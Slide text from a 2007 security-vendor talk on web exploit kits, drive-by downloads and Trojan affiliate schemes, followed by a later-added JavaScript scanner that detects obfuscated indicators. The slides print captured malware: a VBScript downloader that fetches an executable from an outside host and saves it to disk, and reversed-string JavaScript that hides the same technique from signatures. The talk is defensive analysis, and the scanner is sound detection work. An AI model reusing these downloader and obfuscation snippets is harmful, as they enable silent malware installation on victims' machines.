Latest Threats and Attacks in Web Security
Iftach Ian Amit
Director, Security Research
Finjan inc.
Finjan Latest Threats – Greek ICT Forum 2007
The Business Behind New Exploits
IE Vulnerability For Sale
Buying Vulnerabilities
Exploits Selling Service
Web Attacker Toolkit - Website
Web Attacker Toolkit – AV Will Not Detect It
Web Attacker Toolkit – Order Page
Web Attacker Toolkit – Statistics Report
Neo Sploit
Updating the ‘customer’ when new versions are available
The recent ‘Release note’ log
Important update! Please update our product to v1.0.6 RC!
24 April 2007
- fixed crypt algorithm
16 April 2007
- new exploit module added
- removed ANI exploit
- fixed crypt algorithm
11 April 2007
- new exploit module added
- fixed crypt algorithm
31 March 2007
- new exploit module added
22 March 2007
- new exploit module added
MPack Toolkit – Statistics Report
Multi Exploit Pack
Where are the Malicious Servers?
Geo footprint of a single MPack toolkit operator
Drive-by, While Visiting Websites
Innocent Free Games site
Exploits our desktop to install a Trojan
Dynamic Code Obfuscation
Each user session receives different exploit content
Free Whois service ….
1. Exploits the Internet Explorer VML vulnerability
2. Downloads spyware
3. Downloads a malicious JPG file – Trojan.JS.Psyme.ct
4. Checks the type of Anti-Virus installed
5. Injects a virus that the installed Anti-Virus does not detect
AJAX-Based Exploits in the Wild, Hosted in the US
http ://7dias.t35.com/index2.php (Free Web Hosting, IP: 66.45.237.220, Hosted at: Secaucus, New Jersey, USA)
dl = "http://gigafoto.front.ru/pr.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
str1= "Ado"+ "db."+ "Str"+ "eam"
str5=str1
set S = df.createobject(str5,"")
str6="GET"
x.Open str6, dl, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
AJAX request goes undetected
The Trojan to be downloaded
Escape from Anti-Virus signatures
Save Trojan on the victim’s disk
Distributing Malicious Code Using Ads
The Malicious Ad
Trojan-Based Affiliation Program
Trojan-Based Affiliation Program – in Action
What does it look like in the field?
Keeping all this activity under control: Evasive attacks!
Trojan’s Log
Trojan’s Log for Sale
Reactive Security Technologies…
Signatures, Heuristics, URL CAT
They detect known attacks quickly…
BUT THEY
Do not stop the next attack
Do not stop a targeted attack
Require frequent updates
Require huge signature / URL databases
The next wave of attack
A targeted attack
RSS Feed – Malicious Code, Reversed
http://www.tv-personalonline.com/rss2/rss.php
var fname = "C:\\mssync20.exe";
var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");
RE("");
var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");
RE(";)'r_','di'(etubirttAtes.r_");
RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_");
var is_ok = 0;
try {
  var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");
  is_ok = 1;
} catch (e) {}
if (is_ok != 1) {
  try {
    var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");
    is_ok = 1;
  } catch (e) {}
}
function RE(s) { return eval(RV(s)); }
function RV(s) {
  var rev = "";
  for (i = 0; i < s.length; i++) {
    rev = s.charAt(i) + rev;
  }
  return rev;
}
RSS Feed – Malicious Code Reversed
Reversed functions
Reversed malicious code – undetected!
‘Actual’ malicious code – detected (7 out of 31)
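An added example, not part of the original slides: a small scanner that matches indicator strings against normalised views of a script (literal concatenations folded, string literals reversed) instead of its raw bytes, which is where both the split "Ado"+"db." string and the RV()-reversed feed code above hide from signatures. The indicator list, the function names and the benign sample are assumptions for illustration; the two suspicious fragments are quoted from the slides.

```javascript
// Added illustration (not from the slides): match indicators against
// normalised views of a script instead of its raw bytes.
// INDICATORS is an assumed list built from tokens visible on the slides.
const INDICATORS = [
  "adodb.stream",
  "microsoft.xmlhttp",
  "createobject",
  "bd96c556-65a3-11d0-983a-00c04fc29e36",
];

const STRING_LITERAL = /(["'])((?:(?!\1).)*)\1/g;
const LITERAL_CONCAT = /(["'])((?:(?!\1).)*)\1\s*[+&]\s*\1((?:(?!\1).)*)\1/;

const reverse = (s) => [...s].reverse().join("");

// Collapse "Ado" + "db." into "Adodb." until nothing is left to join.
function foldConcats(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(LITERAL_CONCAT, (_m, q, a, b) => q + a + b + q);
  } while (src !== prev);
  return src;
}

// Return "indicator:view" per hit; view names where the token became visible.
function scan(src) {
  const hits = new Set();
  const raw = src.toLowerCase();
  const folded = foldConcats(src).toLowerCase();
  const reversedLiterals = [...folded.matchAll(STRING_LITERAL)]
    .map((m) => reverse(m[2]));
  for (const ind of INDICATORS) {
    if (raw.includes(ind)) hits.add(`${ind}:raw`);
    else if (folded.includes(ind)) hits.add(`${ind}:folded`);
    if (reversedLiterals.some((lit) => lit.includes(ind))) hits.add(`${ind}:reversed`);
  }
  return [...hits];
}

// Two fragments quoted from the slides, plus one constructed benign line.
const SAMPLE_CONCAT = 'str1 = "Ado" + "db." + "Str" + "eam"';
const SAMPLE_REVERSED = 'var _s = RE(";)\'maerts.bdoda\'(tcejbOXevitcA wen");';
const SAMPLE_BENIGN = 'var title = "Weekly RSS digest";';

console.log(scan(SAMPLE_CONCAT), scan(SAMPLE_REVERSED), scan(SAMPLE_BENIGN));
```

Neither suspicious fragment produces a `raw` hit, so a signature over the unmodified text sees nothing; the token only appears in the folded or reversed view.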
Recent Example
Finjan’s Technology: Real-Time Content Inspection (Patented)
Inspecting incoming & outgoing code to detect potentially malicious operations (Delete file, Install program, Change settings, etc.)
Audit Results at Customer Networks
Thank you